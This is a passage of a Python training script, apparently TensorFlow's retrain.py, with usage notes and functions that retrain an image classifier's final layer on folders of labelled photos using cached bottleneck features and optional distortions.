The example folder flower_photos\nshould have a structure like this:\n\n~/flower_photos/daisy/photo1.jpg\n~/flower_photos/daisy/photo2.jpg\n...\n~/flower_photos/rose/anotherphoto77.jpg\n...\n~/flower_photos/sunflower/somepicture.jpg\n\nThe subfolder names are important, since they define what label is applied to\neach image, but the filenames themselves don't matter. (For a working example,\ndownload http://download.tensorflow.org/example_images/flower_photos.tgz\nand run tar xzf flower_photos.tgz to unpack it.)\n\nOnce your images are prepared, and you have pip-installed tensorflow-hub and\na sufficiently recent version of tensorflow, you can run the training with a\ncommand like this:\n\n```bash\npython retrain.py --image_dir ~/flower_photos\n```\n\nYou can replace the image_dir argument with any folder containing subfolders of\nimages. The label for each image is taken from the name of the subfolder it's\nin.\n\nThis produces a new model file that can be loaded and run by any TensorFlow\nprogram, for example the tensorflow/examples/label_image sample code.\n\nBy default this script will use the highly accurate, but comparatively large and\nslow Inception V3 model architecture. It's recommended that you start with this\nto validate that you have gathered good training data, but if you want to deploy\non resource-limited platforms, you can try the `--tfhub_module` flag with a\nMobilenet model. For more information on Mobilenet, see\nhttps://research.googleblog.com/2017/06/mobilenets-open-source-models-for.html\n\nFor example:\n\nRun floating-point version of Mobilenet:\n\n```bash\npython retrain.py --image_dir ~/flower_photos \\\n --tfhub_module https://tfhub.dev/google/imagenet/mobilenet_v1_100_224/feature_vector/3\n```\n\nRun Mobilenet, instrumented for quantization:\n\n```bash\npython retrain.py --image_dir ~/flower_photos/ \\\n --tfhub_module https://tfhub.dev/google/imagenet/mobilenet_v1_100_224/quantops/feature_vector/3\n```\n\nThese instrumented models can be converted to fully quantized mobile models via\nTensorFlow Lite.\n\nThere are different Mobilenet models to choose from, with a variety of file\nsize and latency options.\n - The first number can be '100', '075', '050', or '025' to control the number\n of neurons (activations of hidden layers); the number of weights (and hence\n to some extent the file size and speed) shrinks with the square of that\n fraction.\n - The second number is the input image size. You can choose '224', '192',\n '160', or '128', with smaller sizes giving faster speeds.\n\nTo use with TensorBoard:\n\nBy default, this script will log summaries to /tmp/retrain_logs directory\n\nVisualize the summaries with this command:\n\ntensorboard --logdir /tmp/retrain_logs\n\nTo use with Tensorflow Serving, run this tool with --saved_model_dir set\nto some increasingly numbered export location under the model base path, e.g.:\n\n```bash\npython retrain.py (... other args as before ...) 
\\\n --saved_model_dir=/tmp/saved_models/$(date +%s)/\ntensorflow_model_server --port=9000 --model_name=my_image_classifier \\\n --model_base_path=/tmp/saved_models/\n```\n\"\"\"\n# pylint: enable=line-too-long\n\nfrom absl import logging\n\nimport argparse\nimport collections\nfrom datetime import datetime\nimport hashlib\nimport os.path\nimport random\nimport re\nimport sys\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom tensorflow.contrib import quantize as contrib_quantize\n\nFLAGS = None\n\nMAX_NUM_IMAGES_PER_CLASS = 2 ** 27 - 1 # ~134M\n\n# A module is understood as instrumented for quantization with TF-Lite\n# if it contains any of these ops.\nFAKE_QUANT_OPS = ('FakeQuantWithMinMaxVars',\n 'FakeQuantWithMinMaxVarsPerChannel')\n\n\ndef create_image_lists(image_dir, testing_percentage, validation_percentage):\n \"\"\"Builds a list of training images from the file system.\n\n Analyzes the sub folders in the image directory, splits them into stable\n training, testing, and validation sets, and returns a data structure\n describing the lists of images for each label and their paths.\n\n Args:\n image_dir: String path to a folder containing subfolders of images.\n testing_percentage: Integer percentage of the images to reserve for tests.\n validation_percentage: Integer percentage of images reserved for validation.\n\n Returns:\n An OrderedDict containing an entry for each label subfolder, with images\n split into training, testing, and validation sets within each label.\n The order of items defines the class indices.\n \"\"\"\n if not tf.gfile.Exists(image_dir):\n logging.error(\"Image directory '\" + image_dir + \"' not found.\")\n return None\n result = collections.OrderedDict()\n sub_dirs = sorted(x[0] for x in tf.gfile.Walk(image_dir))\n # The root directory comes first, so skip it.\n is_root_dir = True\n for sub_dir in sub_dirs:\n if is_root_dir:\n is_root_dir = False\n continue\n extensions = sorted(set(os.path.normcase(ext) # Smash case on Windows.\n for ext in ['JPEG', 'JPG', 'jpeg', 'jpg', 'png']))\n file_list = []\n dir_name = os.path.basename(\n # tf.gfile.Walk() returns sub-directory with trailing '/' when it is in\n # Google Cloud Storage, which confuses os.path.basename().\n sub_dir[:-1] if sub_dir.endswith('/') else sub_dir)\n\n if dir_name == image_dir:\n continue\n logging.info(\"Looking for images in '%s'\", dir_name)\n for extension in extensions:\n file_glob = os.path.join(image_dir, dir_name, '*.' + extension)\n file_list.extend(tf.gfile.Glob(file_glob))\n if not file_list:\n logging.warning('No files found')\n continue\n if len(file_list) < 20:\n logging.warning(\n 'WARNING: Folder has less than 20 images, which may cause issues.')\n elif len(file_list) > MAX_NUM_IMAGES_PER_CLASS:\n logging.warning(\n 'WARNING: Folder %s has more than %s images. Some images will '\n 'never be selected.', dir_name, MAX_NUM_IMAGES_PER_CLASS)\n label_name = re.sub(r'[^a-z0-9]+', ' ', dir_name.lower())\n training_images = []\n testing_images = []\n validation_images = []\n for file_name in file_list:\n base_name = os.path.basename(file_name)\n # We want to ignore anything after '_nohash_' in the file name when\n # deciding which set to put an image in, the data set creator has a way of\n # grouping photos that are close variations of each other. 
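(An\n      # illustrative, invented pair: 'leaf_7_nohash_a.jpg' and 'leaf_7_nohash_b.jpg'\n      # both reduce to 'leaf_7' after the re.sub below, so they always land in\n      # the same split.)\n      # 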
For example\n # this is used in the plant disease data set to group multiple pictures of\n # the same leaf.\n hash_name = re.sub(r'_nohash_.*$', '', file_name)\n # This looks a bit magical, but we need to decide whether this file should\n # go into the training, testing, or validation sets, and we want to keep\n # existing files in the same set even if more files are subsequently\n # added.\n # To do that, we need a stable way of deciding based on just the file name\n # itself, so we do a hash of that and then use that to generate a\n # probability value that we use to assign it.\n hash_name_hashed = hashlib.sha1(tf.compat.as_bytes(hash_name)).hexdigest()\n percentage_hash = ((int(hash_name_hashed, 16) %\n (MAX_NUM_IMAGES_PER_CLASS + 1)) *\n (100.0 / MAX_NUM_IMAGES_PER_CLASS))\n if percentage_hash < validation_percentage:\n validation_images.append(base_name)\n elif percentage_hash < (testing_percentage + validation_percentage):\n testing_images.append(base_name)\n else:\n training_images.append(base_name)\n result[label_name] = {\n 'dir': dir_name,\n 'training': training_images,\n 'testing': testing_images,\n 'validation': validation_images,\n }\n return result\n\n\ndef get_image_path(image_lists, label_name, index, image_dir, category):\n \"\"\"Returns a path to an image for a label at the given index.\n\n Args:\n image_lists: OrderedDict of training images for each label.\n label_name: Label string we want to get an image for.\n index: Int offset of the image we want. This will be moduloed by the\n available number of images for the label, so it can be arbitrarily large.\n image_dir: Root folder string of the subfolders containing the training\n images.\n category: Name string of set to pull images from - training, testing, or\n validation.\n\n Returns:\n File system path string to an image that meets the requested parameters.\n\n \"\"\"\n if label_name not in image_lists:\n logging.fatal('Label does not exist %s.', label_name)\n label_lists = image_lists[label_name]\n if category not in label_lists:\n logging.fatal('Category does not exist %s.', category)\n category_list = label_lists[category]\n if not category_list:\n logging.fatal('Label %s has no images in the category %s.',\n label_name, category)\n mod_index = index % len(category_list)\n base_name = category_list[mod_index]\n sub_dir = label_lists['dir']\n full_path = os.path.join(image_dir, sub_dir, base_name)\n return full_path\n\n\ndef get_bottleneck_path(image_lists, label_name, index, bottleneck_dir,\n category, module_name):\n \"\"\"Returns a path to a bottleneck file for a label at the given index.\n\n Args:\n image_lists: OrderedDict of training images for each label.\n label_name: Label string we want to get an image for.\n index: Integer offset of the image we want. 
This will be moduloed by the\n available number of images for the label, so it can be arbitrarily large.\n bottleneck_dir: Folder string holding cached files of bottleneck values.\n category: Name string of set to pull images from - training, testing, or\n validation.\n module_name: The name of the image module being used.\n\n Returns:\n File system path string to an image that meets the requested parameters.\n \"\"\"\n module_name = (module_name.replace('://', '~') # URL scheme.\n .replace('/', '~') # URL and Unix paths.\n .replace(':', '~').replace('\\\\', '~')) # Windows paths.\n return get_image_path(image_lists, label_name, index, bottleneck_dir,\n category) + '_' + module_name + '.txt'\n\n\ndef create_module_graph(module_spec):\n \"\"\"Creates a graph and loads Hub Module into it.\n\n Args:\n module_spec: the hub.ModuleSpec for the image module being used.\n\n Returns:\n graph: the tf.Graph that was created.\n bottleneck_tensor: the bottleneck values output by the module.\n resized_input_tensor: the input images, resized as expected by the module.\n wants_quantization: a boolean, whether the module has been instrumented\n with fake quantization ops.\n \"\"\"\n height, width = hub.get_expected_image_size(module_spec)\n with tf.Graph().as_default() as graph:\n resized_input_tensor = tf.placeholder(tf.float32, [None, height, width, 3])\n m = hub.Module(module_spec)\n bottleneck_tensor = m(resized_input_tensor)\n wants_quantization = any(node.op in FAKE_QUANT_OPS\n for node in graph.as_graph_def().node)\n return graph, bottleneck_tensor, resized_input_tensor, wants_quantization\n\n\ndef run_bottleneck_on_image(sess, image_data, image_data_tensor,\n decoded_image_tensor, resized_input_tensor,\n bottleneck_tensor):\n \"\"\"Runs inference on an image to extract the 'bottleneck' summary layer.\n\n Args:\n sess: Current active TensorFlow Session.\n image_data: String of raw JPEG data.\n image_data_tensor: Input data layer in the graph.\n decoded_image_tensor: Output of initial image resizing and preprocessing.\n resized_input_tensor: The input node of the recognition graph.\n bottleneck_tensor: Layer before the final softmax.\n\n Returns:\n Numpy array of bottleneck values.\n \"\"\"\n # First decode the JPEG image, resize it, and rescale the pixel values.\n resized_input_values = sess.run(decoded_image_tensor,\n {image_data_tensor: image_data})\n # Then run it through the recognition network.\n bottleneck_values = sess.run(bottleneck_tensor,\n {resized_input_tensor: resized_input_values})\n bottleneck_values = np.squeeze(bottleneck_values)\n return bottleneck_values\n\n\ndef ensure_dir_exists(dir_name):\n \"\"\"Makes sure the folder exists on disk.\n\n Args:\n dir_name: Path string to the folder we want to create.\n \"\"\"\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n\ndef create_bottleneck_file(bottleneck_path, image_lists, label_name, index,\n image_dir, category, sess, jpeg_data_tensor,\n decoded_image_tensor, resized_input_tensor,\n bottleneck_tensor):\n \"\"\"Create a single bottleneck file.\"\"\"\n logging.debug('Creating bottleneck at %s', bottleneck_path)\n image_path = get_image_path(image_lists, label_name, index,\n image_dir, category)\n if not tf.gfile.Exists(image_path):\n logging.fatal('File does not exist %s', image_path)\n image_data = tf.gfile.GFile(image_path, 'rb').read()\n try:\n bottleneck_values = run_bottleneck_on_image(\n sess, image_data, jpeg_data_tensor, decoded_image_tensor,\n resized_input_tensor, bottleneck_tensor)\n except Exception as e:\n 
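# re-raise with the offending file path attached; nothing in this script\n    # catches the RuntimeError, so one unreadable image aborts the caching pass\n    # instead of silently writing a bad bottleneck file\n    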
raise RuntimeError('Error during processing file %s (%s)' % (image_path,\n str(e)))\n bottleneck_string = ','.join(str(x) for x in bottleneck_values)\n with tf.gfile.GFile(bottleneck_path, 'w') as bottleneck_file:\n bottleneck_file.write(bottleneck_string)\n\n\ndef get_or_create_bottleneck(sess, image_lists, label_name, index, image_dir,\n category, bottleneck_dir, jpeg_data_tensor,\n decoded_image_tensor, resized_input_tensor,\n bottleneck_tensor, module_name):\n \"\"\"Retrieves or calculates bottleneck values for an image.\n\n If a cached version of the bottleneck data exists on-disk, return that,\n otherwise calculate the data and save it to disk for future use.\n\n Args:\n sess: The current active TensorFlow Session.\n image_lists: OrderedDict of training images for each label.\n label_name: Label string we want to get an image for.\n index: Integer offset of the image we want. This will be modulo-ed by the\n available number of images for the label, so it can be arbitrarily large.\n image_dir: Root folder string of the subfolders containing the training\n images.\n category: Name string of which set to pull images from - training, testing,\n or validation.\n bottleneck_dir: Folder string holding cached files of bottleneck values.\n jpeg_data_tensor: The tensor to feed loaded jpeg data into.\n decoded_image_tensor: The output of decoding and resizing the image.\n resized_input_tensor: The input node of the recognition graph.\n bottleneck_tensor: The output tensor for the bottleneck values.\n module_name: The name of the image module being used.\n\n Returns:\n Numpy array of values produced by the bottleneck layer for the image.\n \"\"\"\n label_lists = image_lists[label_name]\n sub_dir = label_lists['dir']\n sub_dir_path = os.path.join(bottleneck_dir, sub_dir)\n ensure_dir_exists(sub_dir_path)\n bottleneck_path = get_bottleneck_path(image_lists, label_name, index,\n bottleneck_dir, category, module_name)\n if not os.path.exists(bottleneck_path):\n create_bottleneck_file(bottleneck_path, image_lists, label_name, index,\n image_dir, category, sess, jpeg_data_tensor,\n decoded_image_tensor, resized_input_tensor,\n bottleneck_tensor)\n with tf.gfile.GFile(bottleneck_path, 'r') as bottleneck_file:\n bottleneck_string = bottleneck_file.read()\n did_hit_error = False\n try:\n bottleneck_values = [float(x) for x in bottleneck_string.split(',')]\n except ValueError:\n logging.warning('Invalid float found, recreating bottleneck')\n did_hit_error = True\n if did_hit_error:\n create_bottleneck_file(bottleneck_path, image_lists, label_name, index,\n image_dir, category, sess, jpeg_data_tensor,\n decoded_image_tensor, resized_input_tensor,\n bottleneck_tensor)\n with tf.gfile.GFile(bottleneck_path, 'r') as bottleneck_file:\n bottleneck_string = bottleneck_file.read()\n # Allow exceptions to propagate here, since they shouldn't happen after a\n # fresh creation\n bottleneck_values = [float(x) for x in bottleneck_string.split(',')]\n return bottleneck_values\n\n\ndef cache_bottlenecks(sess, image_lists, image_dir, bottleneck_dir,\n jpeg_data_tensor, decoded_image_tensor,\n resized_input_tensor, bottleneck_tensor, module_name):\n \"\"\"Ensures all the training, testing, and validation bottlenecks are cached.\n\n Because we're likely to read the same image multiple times (if there are no\n distortions applied during training) it can speed things up a lot if we\n calculate the bottleneck layer values once for each image during\n preprocessing, and then just read those cached values repeatedly during\n 
training. Here we go through all the images we've found, calculate those\n values, and save them off.\n\n Args:\n sess: The current active TensorFlow Session.\n image_lists: OrderedDict of training images for each label.\n image_dir: Root folder string of the subfolders containing the training\n images.\n bottleneck_dir: Folder string holding cached files of bottleneck values.\n jpeg_data_tensor: Input tensor for jpeg data from file.\n decoded_image_tensor: The output of decoding and resizing the image.\n resized_input_tensor: The input node of the recognition graph.\n bottleneck_tensor: The penultimate output layer of the graph.\n module_name: The name of the image module being used.\n\n Returns:\n Nothing.\n \"\"\"\n how_many_bottlenecks = 0\n ensure_dir_exists(bottleneck_dir)\n for label_name, label_lists in image_lists.items():\n for category in ['training', 'testing', 'validation']:\n category_list = label_lists[category]\n for index, unused_base_name in enumerate(category_list):\n get_or_create_bottleneck(\n sess, image_lists, label_name, index, image_dir, category,\n bottleneck_dir, jpeg_data_tensor, decoded_image_tensor,\n resized_input_tensor, bottleneck_tensor, module_name)\n\n how_many_bottlenecks += 1\n if how_many_bottlenecks % 100 == 0:\n logging.info('%s bottleneck files created.', how_many_bottlenecks)\n\n\ndef get_random_cached_bottlenecks(sess, image_lists, how_many, category,\n bottleneck_dir, image_dir, jpeg_data_tensor,\n decoded_image_tensor, resized_input_tensor,\n bottleneck_tensor, module_name):\n \"\"\"Retrieves bottleneck values for cached images.\n\n If no distortions are being applied, this function can retrieve the cached\n bottleneck values directly from disk for images. It picks a random set of\n images from the specified category.\n\n Args:\n sess: Current TensorFlow Session.\n image_lists: OrderedDict of training images for each label.\n how_many: If positive, a random sample of this size will be chosen.\n If negative, all bottlenecks will be retrieved.\n category: Name string of which set to pull from - training, testing, or\n validation.\n bottleneck_dir: Folder string holding cached files of bottleneck values.\n image_dir: Root folder string of the subfolders containing the training\n images.\n jpeg_data_tensor: The layer to feed jpeg image data into.\n decoded_image_tensor: The output of decoding and resizing the image.\n resized_input_tensor: The input node of the recognition graph.\n bottleneck_tensor: The bottleneck output layer of the CNN graph.\n module_name: The name of the image module being used.\n\n Returns:\n List of bottleneck arrays, their corresponding ground truths, and the\n relevant filenames.\n \"\"\"\n class_count = len(image_lists.keys())\n bottlenecks = []\n ground_truths = []\n filenames = []\n if how_many >= 0:\n # Retrieve a random sample of bottlenecks.\n for unused_i in range(how_many):\n label_index = random.randrange(class_count)\n label_name = list(image_lists.keys())[label_index]\n image_index = random.randrange(MAX_NUM_IMAGES_PER_CLASS + 1)\n image_name = get_image_path(image_lists, label_name, image_index,\n image_dir, category)\n bottleneck = get_or_create_bottleneck(\n sess, image_lists, label_name, image_index, image_dir, category,\n bottleneck_dir, jpeg_data_tensor, decoded_image_tensor,\n resized_input_tensor, bottleneck_tensor, module_name)\n bottlenecks.append(bottleneck)\n ground_truths.append(label_index)\n filenames.append(image_name)\n else:\n # Retrieve all bottlenecks.\n for label_index, label_name in 
enumerate(image_lists.keys()):\n for image_index, image_name in enumerate(\n image_lists[label_name][category]):\n image_name = get_image_path(image_lists, label_name, image_index,\n image_dir, category)\n bottleneck = get_or_create_bottleneck(\n sess, image_lists, label_name, image_index, image_dir, category,\n bottleneck_dir, jpeg_data_tensor, decoded_image_tensor,\n resized_input_tensor, bottleneck_tensor, module_name)\n bottlenecks.append(bottleneck)\n ground_truths.append(label_index)\n filenames.append(image_name)\n return bottlenecks, ground_truths, filenames\n\n\ndef get_random_distorted_bottlenecks(\n sess, image_lists, how_many, category, image_dir, input_jpeg_tensor,\n distorted_image, resized_input_tensor, bottleneck_tensor):\n \"\"\"Retrieves bottleneck values for training images, after distortions.\n\n If we're training with distortions like crops, scales, or flips, we have to\n recalculate the full model for every image, and so we can't use cached\n bottleneck values. Instead we find random images for the requested category,\n run them through the distortion graph, and then the full graph to get the\n bottleneck results for each.\n\n Args:\n sess: Current TensorFlow Session.\n image_lists: OrderedDict of training images for each label.\n how_many: The integer number of bottleneck values to return.\n category: Name string of which set of images to fetch - training, testing,\n or validation.\n image_dir: Root folder string of the subfolders containing the training\n images.\n input_jpeg_tensor: The input layer we feed the image data to.\n distorted_image: The output node of the distortion graph.\n resized_input_tensor: The input node of the recognition graph.\n bottleneck_tensor: The bottleneck output layer of the CNN graph.\n\n Returns:\n List of bottleneck arrays and their corresponding ground truths.\n \"\"\"\n class_count = len(image_lists.keys())\n bottlenecks = []\n ground_truths = []\n for unused_i in range(how_many):\n label_index = random.randrange(class_count)\n label_name = list(image_lists.keys())[label_index]\n image_index = random.randrange(MAX_NUM_IMAGES_PER_CLASS + 1)\n image_path = get_image_path(image_lists, label_name, image_index, image_dir,\n category)\n if not tf.gfile.Exists(image_path):\n logging.fatal('File does not exist %s', image_path)\n jpeg_data = tf.gfile.GFile(image_path, 'rb').read()\n # Note that we materialize the distorted_image_data as a numpy array before\n # sending running inference on the image. 
This involves 2 memory copies and\n # might be optimized in other implementations.\n distorted_image_data = sess.run(distorted_image,\n {input_jpeg_tensor: jpeg_data})\n bottleneck_values = sess.run(bottleneck_tensor,\n {resized_input_tensor: distorted_image_data})\n bottleneck_values = np.squeeze(bottleneck_values)\n bottlenecks.append(bottleneck_values)\n ground_truths.append(label_index)\n return bottlenecks, ground_truths\n\n\ndef should_distort_images(flip_left_right, random_crop, random_scale,\n random_brightness):\n \"\"\"Whether any distortions are enabled, from the input flags.\n\n Args:\n flip_left_right: Boolean whether to randomly mirror images horizontally.\n random_crop: Integer percentage setting the total margin used around the\n crop box.\n random_scale: Integer percentage of how much to vary the scale by.\n random_brightness: Integer range to randomly multiply the pixel values by.\n\n Returns:\n Boolean value indicating whether any distortions should be applied.\n \"\"\"\n return (flip_left_right or (random_crop != 0) or (random_scale != 0) or\n (random_brightness != 0))\n\n\ndef add_input_distortions(flip_left_right, random_crop, random_scale,\n random_brightness, module_spec):\n \"\"\"Creates the operations to apply the specified distortions.\n\n During training it can help to improve the results if we run the images\n through simple distortions like crops, scales, and flips. These reflect the\n kind of variations we expect in the real world, and so can help train the\n model to cope with natural data more effectively. Here we take the supplied\n parameters and construct a network of operations to apply them to an image.\n\n Cropping\n ~~~~~~~~\n\n Cropping is done by placing a bounding box at a random position in the full\n image. The cropping parameter controls the size of that box relative to the\n input image. If it's zero, then the box is the same size as the input and no\n cropping is performed. If the value is 50%, then the crop box will be half the\n width and height of the input. In a diagram it looks like this:\n\n < width >\n +---------------------+\n | |\n | width - crop% |\n | < > |\n | +------+ |\n | | | |\n | | | |\n | | | |\n | +------+ |\n | |\n | |\n +---------------------+\n\n Scaling\n ~~~~~~~\n\n Scaling is a lot like cropping, except that the bounding box is always\n centered and its size varies randomly within the given range. For example if\n the scale percentage is zero, then the bounding box is the same size as the\n input and no scaling is applied. 
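(A hedged sketch of the box math used by the implementation below; the names mirror the code, and `random_crop`/`random_scale` are the integer percentage flags:\n\n margin_scale = 1.0 + (random_crop / 100.0) # fixed crop margin, e.g. 1.05 for 5%\n resize_scale = 1.0 + (random_scale / 100.0) # upper bound for the random draw\n # pre-crop edge length = input edge * margin_scale * uniform(1.0, resize_scale)\n\n )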
If it's 50%, then the bounding box will be in\n a random range between half the width and height and full size.\n\n Args:\n flip_left_right: Boolean whether to randomly mirror images horizontally.\n random_crop: Integer percentage setting the total margin used around the\n crop box.\n random_scale: Integer percentage of how much to vary the scale by.\n random_brightness: Integer range to randomly multiply the pixel values by.\n graph.\n module_spec: The hub.ModuleSpec for the image module being used.\n\n Returns:\n The jpeg input layer and the distorted result tensor.\n \"\"\"\n input_height, input_width = hub.get_expected_image_size(module_spec)\n input_depth = hub.get_num_image_channels(module_spec)\n jpeg_data = tf.placeholder(tf.string, name='DistortJPGInput')\n decoded_image = tf.image.decode_jpeg(jpeg_data, channels=input_depth)\n # Convert from full range of uint8 to range [0,1] of float32.\n decoded_image_as_float = tf.image.convert_image_dtype(decoded_image,\n tf.float32)\n decoded_image_4d = tf.expand_dims(decoded_image_as_float, 0)\n margin_scale = 1.0 + (random_crop / 100.0)\n resize_scale = 1.0 + (random_scale / 100.0)\n margin_scale_value = tf.constant(margin_scale)\n resize_scale_value = tf.random_uniform(shape=[],\n minval=1.0,\n maxval=resize_scale)\n scale_value = tf.multiply(margin_scale_value, resize_scale_value)\n precrop_width = tf.multiply(scale_value, input_width)\n precrop_height = tf.multiply(scale_value, input_height)\n precrop_shape = tf.stack([precrop_height, precrop_width])\n precrop_shape_as_int = tf.cast(precrop_shape, dtype=tf.int32)\n precropped_image = tf.image.resize_bilinear(decoded_image_4d,\n precrop_shape_as_int)\n precropped_image_3d = tf.squeeze(precropped_image, axis=[0])\n cropped_image = tf.random_crop(precropped_image_3d,\n [input_height, input_width, input_depth])\n if flip_left_right:\n flipped_image = tf.image.random_flip_left_right(cropped_image)\n else:\n flipped_image = cropped_image\n brightness_min = 1.0 - (random_brightness / 100.0)\n brightness_max = 1.0 + (random_brightness / 100.0)\n brightness_value = tf.random_uniform(shape=[],\n minval=brightness_min,\n maxval=brightness_max)\n brightened_image = tf.multiply(flipped_image, brightness_value)\n distort_result = tf.expand_dims(brightened_image, 0, name='DistortResult')\n return jpeg_data, distort_result\n\n\ndef variable_summaries(var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\n\ndef add_final_retrain_ops(class_count, final_tensor_name, bottleneck_tensor,\n quantize_layer, is_training):\n \"\"\"Adds a new softmax and fully-connected layer for training and eval.\n\n We need to retrain the top layer to identify our new classes, so this function\n adds the right operations to the graph, along with some variables to hold the\n weights, and then sets up all the gradients for the backward pass.\n\n The set up for the softmax and fully-connected layers is based on:\n https://www.tensorflow.org/tutorials/mnist/beginners/index.html\n\n Args:\n class_count: Integer of how many categories of things we're trying to\n recognize.\n final_tensor_name: Name string for the new final node that 
produces results.\n bottleneck_tensor: The output of the main CNN graph.\n quantize_layer: Boolean, specifying whether the newly added layer should be\n instrumented for quantization with TF-Lite.\n is_training: Boolean, specifying whether the newly add layer is for training\n or eval.\n\n Returns:\n The tensors for the training and cross entropy results, and tensors for the\n bottleneck input and ground truth input.\n \"\"\"\n batch_size, bottleneck_tensor_size = bottleneck_tensor.get_shape().as_list()\n assert batch_size is None, 'We want to work with arbitrary batch size.'\n with tf.name_scope('input'):\n bottleneck_input = tf.placeholder_with_default(\n bottleneck_tensor,\n shape=[batch_size, bottleneck_tensor_size],\n name='BottleneckInputPlaceholder')\n\n ground_truth_input = tf.placeholder(\n tf.int64, [batch_size], name='GroundTruthInput')\n\n # Organizing the following ops so they are easier to see in TensorBoard.\n layer_name = 'final_retrain_ops'\n with tf.name_scope(layer_name):\n with tf.name_scope('weights'):\n initial_value = tf.truncated_normal(\n [bottleneck_tensor_size, class_count], stddev=0.001)\n layer_weights = tf.Variable(initial_value, name='final_weights')\n variable_summaries(layer_weights)\n\n with tf.name_scope('biases'):\n layer_biases = tf.Variable(tf.zeros([class_count]), name='final_biases')\n variable_summaries(layer_biases)\n\n with tf.name_scope('Wx_plus_b'):\n logits = tf.matmul(bottleneck_input, layer_weights) + layer_biases\n tf.summary.histogram('pre_activations', logits)\n\n final_tensor = tf.nn.softmax(logits, name=final_tensor_name)\n\n # The tf.contrib.quantize functions rewrite the graph in place for\n # quantization. The imported model graph has already been rewritten, so upon\n # calling these rewrites, only the newly added final layer will be\n # transformed.\n if quantize_layer:\n if is_training:\n contrib_quantize.create_training_graph()\n else:\n contrib_quantize.create_eval_graph()\n\n tf.summary.histogram('activations', final_tensor)\n\n # If this is an eval graph, we don't need to add loss ops or an optimizer.\n if not is_training:\n return None, None, bottleneck_input, ground_truth_input, final_tensor\n\n with tf.name_scope('cross_entropy'):\n cross_entropy_mean = tf.losses.sparse_softmax_cross_entropy(\n labels=ground_truth_input, logits=logits)\n\n tf.summary.scalar('cross_entropy', cross_entropy_mean)\n\n with tf.name_scope('train'):\n optimizer = tf.train.GradientDescentOptimizer(FLAGS.learning_rate)\n train_step = optimizer.minimize(cross_entropy_mean)\n\n return (train_step, cross_entropy_mean, bottleneck_input, ground_truth_input,\n final_tensor)\n\n\ndef add_evaluation_step(result_tensor, ground_truth_tensor):\n \"\"\"Inserts the operations we need to evaluate the accuracy of our results.\n\n Args:\n result_tensor: The new final node that produces results.\n ground_truth_tensor: The node we feed ground truth data\n into.\n\n Returns:\n Tuple of (evaluation step, prediction).\n \"\"\"\n with tf.name_scope('accuracy'):\n with tf.name_scope('correct_prediction'):\n prediction = tf.argmax(result_tensor, 1)\n correct_prediction = tf.equal(prediction, ground_truth_tensor)\n with tf.name_scope('accuracy'):\n evaluation_step = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('accuracy', evaluation_step)\n return evaluation_step, prediction\n\n\ndef run_final_eval(train_session, module_spec, class_count, image_lists,\n jpeg_data_tensor, decoded_image_tensor,\n resized_image_tensor, bottleneck_tensor):\n 
\"\"\"Runs a final evaluation on an eval graph using the test data set.\n\n Args:\n train_session: Session for the train graph with the tensors below.\n module_spec: The hub.ModuleSpec for the image module being used.\n class_count: Number of classes\n image_lists: OrderedDict of training images for each label.\n jpeg_data_tensor: The layer to feed jpeg image data into.\n decoded_image_tensor: The output of decoding and resizing the image.\n resized_image_tensor: The input node of the recognition graph.\n bottleneck_tensor: The bottleneck output layer of the CNN graph.\n \"\"\"\n test_bottlenecks, test_ground_truth, test_filenames = (\n get_random_cached_bottlenecks(train_session, image_lists,\n FLAGS.test_batch_size,\n 'testing', FLAGS.bottleneck_dir,\n FLAGS.image_dir, jpeg_data_tensor,\n decoded_image_tensor, resized_image_tensor,\n bottleneck_tensor, FLAGS.tfhub_module))\n\n (eval_session, _, bottleneck_input, ground_truth_input, evaluation_step,\n prediction) = build_eval_session(module_spec, class_count)\n test_accuracy, predictions = eval_session.run(\n [evaluation_step, prediction],\n feed_dict={\n bottleneck_input: test_bottlenecks,\n ground_truth_input: test_ground_truth\n })\n logging.info('Final test accuracy = %.1f%% (N=%d)',\n test_accuracy * 100, len(test_bottlenecks))\n\n if FLAGS.print_misclassified_test_images:\n logging.info('=== MISCLASSIFIED TEST IMAGES ===')\n for i, test_filename in enumerate(test_filenames):\n if predictions[i] != test_ground_truth[i]:\n logging.info('%70s %s', test_filename,\n list(image_lists.keys())[predictions[i]])\n\n\ndef build_eval_session(module_spec, class_count):\n \"\"\"Builds an restored eval session without train operations for exporting.\n\n Args:\n module_spec: The hub.ModuleSpec for the image module being used.\n class_count: Number of classes\n\n Returns:\n Eval session containing the restored eval graph.\n The bottleneck input, ground truth, eval step, and prediction tensors.\n \"\"\"\n # If quantized, we need to create the correct eval graph for exporting.\n eval_graph, bottleneck_tensor, resized_input_tensor, wants_quantization = (\n create_module_graph(module_spec))\n\n eval_sess = tf.Session(graph=eval_graph)\n with eval_graph.as_default():\n # Add the new layer for exporting.\n (_, _, bottleneck_input,\n ground_truth_input, final_tensor) = add_final_retrain_ops(\n class_count, FLAGS.final_tensor_name, bottleneck_tensor,\n wants_quantization, is_training=False)\n\n # Now we need to restore the values from the training graph to the eval\n # graph.\n tf.train.Saver().restore(eval_sess, FLAGS.checkpoint_path)\n\n evaluation_step, prediction = add_evaluation_step(final_tensor,\n ground_truth_input)\n\n return (eval_sess, resized_input_tensor, bottleneck_input, ground_truth_input,\n evaluation_step, prediction)\n\n\ndef save_graph_to_file(graph_file_name, module_spec, class_count):\n \"\"\"Saves an graph to file, creating a valid quantized one if necessary.\"\"\"\n sess, _, _, _, _, _ = build_eval_session(module_spec, class_count)\n graph = sess.graph\n\n output_graph_def = tf.graph_util.convert_variables_to_constants(\n sess, graph.as_graph_def(), [FLAGS.final_tensor_name])\n\n with tf.gfile.GFile(graph_file_name, 'wb') as f:\n f.write(output_graph_def.SerializeToString())\n\n\ndef prepare_file_system():\n # Set up the directory we'll write summaries to for TensorBoard\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n if 
